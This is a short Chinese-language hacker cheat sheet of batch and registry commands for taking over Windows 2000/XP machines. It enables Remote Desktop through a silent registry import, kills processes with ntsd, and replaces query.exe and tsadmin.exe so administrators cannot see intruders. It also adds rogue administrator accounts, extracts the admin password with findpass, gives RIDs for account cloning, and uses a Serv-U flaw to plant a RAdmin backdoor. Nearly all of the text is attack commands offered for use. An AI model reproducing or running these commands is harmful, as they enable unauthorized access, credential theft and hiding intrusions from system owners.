2000 XP 开3389

echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]>> 3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
 regedit /s 3389.reg

列举进程的脚本。
 
@echo for each ps in getobject _ >ps.vbs
@echo ("winmgmts://./root/cimv2:win32_process").instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
cscript ps.vbs

ntsd -c q -p 200

 

echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
regedit /s 3389.reg

查询终端服务端口：reg query "HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal Server/WinStations/RDP-TCP-PortNumber"

 

 

登陆终端后有两个东东很危险，query.exe和tsadmin.exe要Kill掉
可以写两个bat文件
@echo off
@copy c:/winnt/system32/query.exe c:/winnt/system32/com/1/que.exe
@del c:/winnt/system32/query.exe
@del %SYSTEMROOT%/system32/dllcache/query.exe
@copy c:/winnt/system32/com/1/query.exe c:/winnt/system32/query.exe //复制一个假的

@echo off
@copy c:/winnt/system32/tsadmin.exe c:/winnt/system32/com/1/tsadmin.exe
@del c:/winnt/system32/tsadmin.exe
@del %SYSTEMROOT%/system32/dllcache/tsadmin.exe

 

 

 

一些很有用的老知识
type c:/boot.ini ( 查看系统版本 )
net start (查看已经启动的服务)
query user ( 查看当前终端连接 )
net user ( 查看当前用户 )
net user 用户 密码/add ( 建立账号 )
net localgroup administrators 用户 /add (提升某用户为管理员)
ipconfig -all ( 查看IP什么的 )
netstat -an ( 查看当前网络状态 )
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
克隆时Administrator对应1F4
guest对应1F5
tsinternetuser对应3E8

如果对方没开3389，但是装了Remote Administrator Service
用这个命令F:/ftp.exe "regedit -s F:/longyi.biz/RAdmin.reg" 连接
解释：用serv-u漏洞导入自己配制好的radmin的注册表信息
先备份对方的F:/ftp.exe "regedit -e F:/1.reg HKEY_LOCAL_MACHINE/SYSTEM/RAdmin"